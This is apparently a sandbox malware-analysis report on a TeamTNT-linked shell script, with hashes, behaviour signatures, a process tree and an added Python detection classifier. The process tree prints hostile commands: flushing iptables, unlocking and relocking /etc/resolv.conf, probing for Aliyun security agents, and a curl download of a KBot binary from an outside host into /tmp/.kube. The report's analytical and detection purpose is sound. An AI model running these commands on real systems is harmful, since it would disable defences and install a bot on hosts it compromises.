Analysis

  • max time kernel
    149s
  • max time network
    132s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    29-12-2024 23:10

General

  • Target

    SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh

  • Size

    33KB

  • MD5

    dd89ab7314e13989bdcae176a82078ac

  • SHA1

    9ed46a6dde1dc1de4eed8185c1d622a5fc97092c

  • SHA256

    1b72088fc6d780da95465f80ab26ba094d89232ff30a41b1b0113c355cfffa57

  • SHA512

    e56722b308702bec178a1eca47c400af2435b57b190a10307aec0eebdfd4ef04ec6d63302a754b508a62d64668cb7b4edbc596a4e40c409e34b4934265d7db3d

  • SSDEEP

    768:DBxlT2wDGWvWCrDN+FylT4hxXpGdKI3oB6RXrsdrCIZMfXxK2eJ5tLW:qWN+Fyl1dRoGrq9W

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Flushes firewall rules 1 TTPs 2 IoCs

    Flushes or disables firewall rules inside the Linux kernel.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Attempts to change immutable files 3 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
    "/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh"
    1⤵
    • Writes DNS configuration
    PID:1477
    • /bin/hostname
      hostname
      2⤵
      PID:1478
    • /bin/grep
      grep -i "[a]liyun"
      2⤵
      PID:1480
    • /bin/ps
      ps aux
      2⤵
      • Reads CPU attributes
      • Process Discovery
      • Reads runtime system information
      PID:1479
    • /bin/grep
      grep -i "[y]unjing"
      2⤵
      PID:1482
    • /bin/ps
      ps aux
      2⤵
      • Reads CPU attributes
      • Process Discovery
      • Reads runtime system information
      PID:1481
    • /sbin/iptables
      iptables -F
      2⤵
      • Flushes firewall rules
      PID:1483
    • /usr/bin/chattr
      chattr -ia /etc/resolv.conf
      2⤵
      • Attempts to change immutable files
      PID:1489
    • /usr/bin/chattr
      chattr +i /etc/resolv.conf
      2⤵
      • Attempts to change immutable files
      PID:1490
    • /usr/bin/chattr
      chattr -ia / /tmp/ /var/ /var/tmp/
      2⤵
      • Attempts to change immutable files
      PID:1491
    • /bin/chmod
      chmod 1777 /tmp/ /var/ /var/tmp/
      2⤵
      • File and Directory Permissions Modification
      PID:1492
    • /sbin/iptables
      iptables -F
      2⤵
      • Flushes firewall rules
      PID:1493
    • /usr/bin/curl
      curl -sLk http://chimaera.cc/bin/KBot/x86_64 -o /tmp/.kube
      2⤵
      PID:1494
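The command lines in the process tree above map directly onto the signatures listed for this sample: two `iptables -F` flushes, three `chattr` calls on the immutable/append-only bits (the second of which re-locks the overwritten /etc/resolv.conf with `+i`), a `chmod 1777` on the temp directories, `ps aux | grep -i "[a]liyun"` / `"[y]unjing"` checks for Alibaba Cloud security agents (the bracketed first letter keeps grep from matching its own command line in the `ps` output), and a `curl -k` download of the x86_64 KBot payload to the hidden path /tmp/.kube. The Python below is an added example, not the sandbox's own signature engine: it classifies each captured command line against rules named after the report's signatures, reproduces the per-signature IoC counts from the transcribed tree, and adds a responder-side check that parses `lsattr` output to confirm whether /etc/resolv.conf was left immutable. The rule names that do not appear in the signature list, the bracket-grep regex, and the sample `lsattr` line are assumptions of the example.

```python
"""Map captured Linux command lines onto the behaviours flagged in this
report. Added example: the rule names mirror the report's signatures, but
the classifier itself is not the sandbox's signature engine."""
import re
import shlex
from collections import Counter

# Constructed sample input: (pid, command line) transcribed from the process tree.
PROCESS_TREE = [
    (1478, 'hostname'),
    (1480, 'grep -i "[a]liyun"'),
    (1479, 'ps aux'),
    (1482, 'grep -i "[y]unjing"'),
    (1481, 'ps aux'),
    (1483, 'iptables -F'),
    (1489, 'chattr -ia /etc/resolv.conf'),
    (1490, 'chattr +i /etc/resolv.conf'),
    (1491, 'chattr -ia / /tmp/ /var/ /var/tmp/'),
    (1492, 'chmod 1777 /tmp/ /var/ /var/tmp/'),
    (1493, 'iptables -F'),
    (1494, 'curl -sLk http://chimaera.cc/bin/KBot/x86_64 -o /tmp/.kube'),
]

# "[a]liyun"-style patterns: the bracket keeps grep from matching its own
# command line in `ps aux` output. The regex is an assumption of this example.
BRACKET_GREP = re.compile(r'\[(\w)\](\w+)')


def has_short_flag(args, letter):
    """True if `letter` appears in a single-dash option cluster such as -sLk."""
    return any(a.startswith('-') and not a.startswith('--') and letter in a[1:]
               for a in args)


def classify(cmdline):
    """Return the set of rule names one command line triggers."""
    argv = shlex.split(cmdline)
    if not argv:
        return set()
    prog, args = argv[0].rsplit('/', 1)[-1], argv[1:]
    hits = set()
    if prog == 'iptables' and (has_short_flag(args, 'F') or '--flush' in args):
        hits.add('Flushes firewall rules')
    if prog == 'chattr':
        modes = [a for a in args if a[0] in '+-']
        paths = [a for a in args if a[0] not in '+-']
        if any('i' in m or 'a' in m for m in modes):
            hits.add('Attempts to change immutable files')
        if '/etc/resolv.conf' in paths and any(m.startswith('+') and 'i' in m for m in modes):
            hits.add('Locks DNS resolver config')
    if prog == 'chmod' and any(re.fullmatch(r'1?777', a) for a in args):
        hits.add('File and Directory Permissions Modification')
    if prog == 'ps':
        hits.add('Process Discovery')
    if prog == 'grep':
        m = BRACKET_GREP.search(cmdline)
        if m:
            hits.add('Security agent discovery: ' + (m.group(1) + m.group(2)).lower())
    if prog in ('curl', 'wget'):
        if any(a.startswith(('/tmp/.', '/var/tmp/.', '/dev/shm/.')) for a in args):
            hits.add('Downloads payload to hidden temp path')
        if has_short_flag(args, 'k') or '--insecure' in args:
            hits.add('Download with TLS verification disabled')
    return hits


def summarize(tree=PROCESS_TREE):
    """Count processes per rule, the way the report lists IoC counts per signature."""
    counts = Counter()
    for _pid, cmd in tree:
        counts.update(classify(cmd))
    return counts


def resolv_conf_locked(lsattr_line):
    """Responder check: parse one line of `lsattr /etc/resolv.conf` output and
    report whether the immutable (i) or append-only (a) bit is set, which is
    the state `chattr +i` in the tree leaves behind so the overwritten
    resolver config cannot simply be rewritten by the usual tooling."""
    attrs, _path = lsattr_line.split(None, 1)
    return 'i' in attrs or 'a' in attrs


if __name__ == '__main__':
    for rule, n in sorted(summarize().items()):
        print(f'{n} IoCs  {rule}')
    # Constructed sample lsattr line, not taken from the sandbox run.
    print(resolv_conf_locked('----i---------e------- /etc/resolv.conf'))
```

Run against the transcribed tree, `summarize()` returns 2 for "Flushes firewall rules", 3 for "Attempts to change immutable files", 2 for "Process Discovery" and 1 for "File and Directory Permissions Modification", matching the IoC counts in the Signatures section; the extra rules surface the two agent names the script looks for and the hidden-path, certificate-unchecked download that the sandbox only records as a plain curl process.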

          Network

          MITRE ATT&CK Enterprise v15
